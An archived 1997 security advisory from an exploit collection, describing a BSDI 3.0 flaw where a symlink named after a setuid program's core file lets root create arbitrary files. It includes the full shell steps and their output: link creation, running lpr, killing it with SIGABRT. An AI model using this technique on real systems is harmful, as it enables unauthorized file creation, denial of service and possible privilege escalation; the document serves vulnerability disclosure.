Nmap logo

BSDI 3.x corefile problem

Description:BSDI 3.0 apparently allows any program to overwrite/create files through a core dump link.
Author:Nir Soffer <scorpios@CS.HUJI.AC.IL>
Compromise:Definately DOS, possibly become r00t
Vulnerable Systems:BSDI 3.0
Date:19 June 1997
Notes:Several people mentioned that he was wrong about overwriting files. If the mode is 0600, you CAN overwrite them. This includes a lot of files you might want to overwrite ;).

Date: Thu, 19 Jun 1997 20:42:33 +0300
From: Nir Soffer <scorpios@CS.HUJI.AC.IL>
Subject: Core file anomalies under BSDi 3.0

Well for starters, system information :

BSD/OS beep.cs.huji.ac.il 3.0 BSDI BSD/OS 3.0 Kernel #2: Mon Mar 31
13:39:46 IDT 1997     danny@sexta.cs.huji.ac.il:/usr/src/sys/compile/SEXTA

A small and neat bug in BSDi 3.x allows people to arbitrarly write files
with crap for data, but not overwrite them. Like so:

Have a symbolic link, called [programname].core to desired file. Program
must be setuid root.

beep[ /tmp ] ls -la lpr.core
lrwxrwxrwt  1 root  wheel  9 Jun 19 20:30 lpr.core@ -> /etc/TEST
beep[ /tmp ]

Just to make sure that file doesn't exist :

beep[ /tmp ] ls -la /etc/TEST
ls: /etc/TEST: No such file or directory
beep[ /tmp ]

Run program. (In our case lpr is convenient since it waits for tty input
and suspends itself.)

beep[ /tmp ] lpr &
[1] 27886
beep[ /tmp ]
[1]  + Suspended (tty input)         lpr
beep[ /tmp ]

Kill it with the ABRT signal.

beep[ /tmp ] kill -ABRT %1
beep[ /tmp ] fg
Abort (core dumped)
beep[ /tmp ]

And voila :

beep[ /tmp ] ls -la /etc/TEST
-rw-------  1 root  wheel  184320 Jun 19 20:39 /etc/TEST
beep[ /tmp ]

This exploit is similar to the Solaris 2.4 core exploit - with a few
notable diffrences :

A.) BSDi doesn't give a damn that the euid!=ruid, so finding a setgid
program with priviliges isn't neccesary.

B.) BSDi _does_ however, check if the file exists, so it's quite
impossible to overwrite files.

C.) BSDi _does_ change the permissions of the core dump to 600, and it
keeps on being owned by root, so changing the file is impossible as well.


Nir Soffer AKA ScorpioS, scorpios@cs.huji.ac.il .
USER, n.:
        The word computer professionals use when they mean "idiot."
                -- Dave Barry, "Claw Your Way to the Top"

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]